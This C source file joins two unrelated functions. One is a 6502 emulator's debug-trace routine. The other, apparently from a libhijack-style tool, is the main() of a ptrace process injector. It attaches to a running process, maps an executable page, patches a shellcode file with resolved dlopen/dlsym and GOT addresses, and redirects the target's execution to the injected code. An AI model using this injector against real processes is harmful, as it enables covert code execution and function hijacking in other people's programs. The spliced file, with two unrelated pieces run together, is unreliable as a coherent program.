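// Emit one debug-trace line through the registered debug callback.
//
// The line starts with the current system cycle count; what follows depends
// on `address`:
//   0       - the literal text "CPU Breakpoint"
//   0xffff  - a dump of the 6502 registers (PC, SP, PS, A, X, Y)
//   other   - the NUL-terminated string read from RAM starting at `address`,
//             cut off so the whole message never exceeds 1024 characters
// Nothing is emitted when no callback (mpDebugCallback) is installed.
//
// Fix relative to the previous version: the RAM-string branch read every
// byte twice (once into the buffer, once again in the loop condition); each
// byte is now read exactly once and the terminating NUL also ends the copy.
// All formatted writes are bounded with snprintf.
void CSystem::DebugTrace(int address)
{
    enum { kMaxMessage = 1024 };
    char message[kMaxMessage + 1];   // one spare slot for the final NUL

    // Fixed-width header; bounded so the write can never overrun `message`.
    snprintf(message, sizeof message, "%08x - DebugTrace(): ", gSystemCycleCount);
    int count = (int)strlen(message);

    if (address == 0) {
        snprintf(message + count, sizeof message - (size_t)count, "%s", "CPU Breakpoint");
        count = (int)strlen(message);
    } else if (address == 0xffff) {
        // Register dump
        C6502_REGS regs;
        char linetext[kMaxMessage];
        GetRegs(regs);
        snprintf(linetext, sizeof linetext,
                 "PC=$%04x SP=$%02x PS=0x%02x A=0x%02x X=0x%02x Y=0x%02x",
                 regs.PC, regs.SP, regs.PS, regs.A, regs.X, regs.Y);
        snprintf(message + count, sizeof message - (size_t)count, "%s", linetext);
        count = (int)strlen(message);
    } else {
        // Copy the string stored at `address` into the message. The copy stops
        // after the first NUL byte (which is kept, so `count` includes it) or
        // as soon as `count` reaches kMaxMessage, whichever comes first.
        do {
            char ch = (char)Peek_RAM(address++);
            message[count++] = ch;
            if (ch == 0) {
                break;
            }
        } while (count < kMaxMessage);
    }

    // count <= kMaxMessage on every path, and message has kMaxMessage + 1 slots.
    message[count] = 0;

    // Callback to dump the message
    if (mpDebugCallback) {
        (*mpDebugCallback)(mDebugCallbackObject, message);
    }
}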
/*
 * Entry point of the injector.
 *
 * Arguments (argc must be exactly 5, otherwise usage() is called):
 *   argv[1]  pid of the target process (parsed with atoi, no validation)
 *   argv[2]  path of a file whose whole content is used as the shellcode
 *   argv[3]  string written into the target at filename_addr
 *   argv[4]  string written into the target at funcname_addr; also the name
 *            looked up with FindAllFunctionsByName for the GOT slot
 *
 * The shellcode file is expected to contain 4-byte placeholders
 * (22 22 22 22, 33 33 33 33, 44 44 44 44, 55 55 55 55, 66 66 66 66) which
 * are overwritten below with resolved addresses before the buffer is written
 * into the target.
 *
 * Returns 0 after Detach(); exits with EXIT_FAILURE when attaching or the
 * dlopen/dlsym lookups fail.
 */
int main(int argc, char *argv[])
{
    HIJACK *hijack;
    FUNC *funcs, *func;
    unsigned long shellcode_addr, filename_addr, dlopen_addr, dlsym_addr, funcname_addr, pltgot_addr;
    struct stat sb;
    char *shellcode, *p1;
    int fd;
    struct user_regs_struct *regs, *backup;

    if (argc != 5)
        usage(argv[0]);

    hijack = InitHijack();
    ToggleFlag(hijack, F_DEBUG);
    ToggleFlag(hijack, F_DEBUG_VERBOSE);
    AssignPid(hijack, atoi(argv[1]));
    if (Attach(hijack) != ERROR_NONE) {
        fprintf(stderr, "[-] Couldn't attach!\n");
        exit(EXIT_FAILURE);
    }
    /* Snapshot of the target's registers taken before anything is modified;
     * `regs` is the working copy that is re-synced from `backup` below. */
    backup = GetRegs(hijack);
    regs = malloc(sizeof(struct user_regs_struct));   /* NOTE(review): result unchecked */

    /* Read the whole shellcode file into a heap buffer sized from stat().
     * NOTE(review): stat(), malloc(), open() and read() are all unchecked;
     * a missing or short file leaves `shellcode` partly uninitialised or
     * makes read() operate on fd -1. */
    stat(argv[2], &sb);
    shellcode = malloc(sb.st_size);
    fd = open(argv[2], O_RDONLY);
    read(fd, shellcode, sb.st_size);
    close(fd);

    /* Resolve dlopen/dlsym in the target's copy of libdl (hard-coded path). */
    LocateAllFunctions(hijack);
    funcs = FindFunctionInLibraryByName(hijack, "/lib/libdl.so.2", "dlopen");
    if (!(funcs)) {
        fprintf(stderr, "[-] Couldn't locate dlopen!\n");
        exit(EXIT_FAILURE);
    }
    dlopen_addr = funcs->vaddr;
    printf("dlopen_addr: 0x%08lx\n", dlopen_addr);
    funcs = FindFunctionInLibraryByName(hijack, "/lib/libdl.so.2", "dlsym");
    if (!(funcs)) {
        fprintf(stderr, "[-] Couldn't locate dlsym!\n");
        exit(EXIT_FAILURE);
    }
    dlsym_addr = funcs->vaddr;
    printf("dlsym_addr: 0x%08lx\n", dlsym_addr);

    /* Obtain one anonymous RWX page in the target. The working register copy
     * is restored from `backup` both before and after, presumably because
     * MapMemory drives the call through the target's registers — confirm. */
    memcpy(regs, backup, sizeof(struct user_regs_struct));
    LocateSystemCall(hijack);
    filename_addr = MapMemory(hijack, (unsigned long)NULL, 4096, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE);
    memcpy(regs, backup, sizeof(struct user_regs_struct));

    /* Patch the placeholders in the local shellcode copy with the resolved
     * addresses (4 bytes each, written in host byte order).
     * NOTE(review): memmem() returns NULL when a placeholder is absent and the
     * following memcpy() then writes through a null pointer; the same applies
     * to every memmem/memcpy pair below. */
    p1 = memmem(shellcode, sb.st_size, "\x22\x22\x22\x22", 4);
    memcpy(p1, &filename_addr, 4);
    /* Layout inside the mapped page: argv[3], NUL, argv[4], NUL, shellcode.
     * Only strlen() bytes of each string are written further down; the
     * separating NULs are never written and rely on the fresh anonymous
     * mapping being zero-filled. */
    funcname_addr = filename_addr + strlen(argv[3]) + 1;
    shellcode_addr = funcname_addr + strlen(argv[4]) + 1;
    printf("filename_addr: 0x%08lx\n", filename_addr);
    printf("shellcode_addr: 0x%08lx\n", shellcode_addr);
    printf("esp: 0x%08lx\n", regs->esp);
    printf("eip: 0x%08lx\n", regs->eip);
    p1 = memmem(shellcode, sb.st_size, "\x33\x33\x33\x33", 4);
    memcpy(p1, &dlopen_addr, 4);
    p1 = memmem(shellcode, sb.st_size, "\x44\x44\x44\x44", 4);
    memcpy(p1, &funcname_addr, 4);
    p1 = memmem(shellcode, sb.st_size, "\x55\x55\x55\x55", 4);
    memcpy(p1, &dlsym_addr, 4);

    /* Find the first named match of argv[4] that has a GOT slot.
     * NOTE(review): `pltgot_addr` is never initialised; if the list is empty
     * or no entry has a name, the printf and the patch below use an
     * indeterminate value. */
    funcs = FindAllFunctionsByName(hijack, argv[4], false);
    for (func = funcs; func != NULL; func = func->next) {
        if (!(func->name))
            continue;
        pltgot_addr = FindFunctionInGot(hijack, hijack->pltgot, func->vaddr);
        if (pltgot_addr > 0)
            break;
    }
    printf("pltgot_addr: 0x%08lx\n", pltgot_addr);
    p1 = memmem(shellcode, sb.st_size, "\x66\x66\x66\x66", 4);
    memcpy(p1, &pltgot_addr, 4);

    /* Copy the two strings and the patched shellcode into the mapped page. */
    WriteData(hijack, filename_addr, (unsigned char *)argv[3], strlen(argv[3]));
    WriteData(hijack, funcname_addr, (unsigned char *)argv[4], strlen(argv[4]));
    WriteData(hijack, shellcode_addr, (unsigned char *)shellcode, sb.st_size);

    /* Push the original eip onto the target's stack (so the injected code can
     * return to it) and redirect execution to the shellcode. The order matters:
     * SetRegs publishes the adjusted esp before the write at that address. */
    regs->esp -= 4;
    SetRegs(hijack, regs);
    WriteData(hijack, regs->esp, &(regs->eip), 4);
    regs->eip = shellcode_addr;
    /* If the target was stopped inside a system call that the kernel would
     * restart, eip is advanced by 2 — presumably to cancel the kernel's
     * 2-byte rewind of eip on syscall restart, which would otherwise move
     * execution to shellcode_addr - 2; confirm against the ptrace semantics
     * of the target kernel. Assumes eax/orig_eax are signed here. */
    if (regs->orig_eax >= 0) {
        switch (regs->eax) {
        case -514: /* -ERESTARTNOHAND */
        case -512: /* -ERESTARTSYS */
        case -513: /* -ERESTARTNOINTR */
        case -516: /* -ERESTART_RESTARTBLOCK */
            regs->eip += 2;
            break;
        }
    }
    SetRegs(hijack, regs);
    Detach(hijack);
    /* `regs`, `shellcode` and whatever GetRegs allocated are not freed;
     * the process exits immediately, so this is a leak only in principle. */
    return 0;
}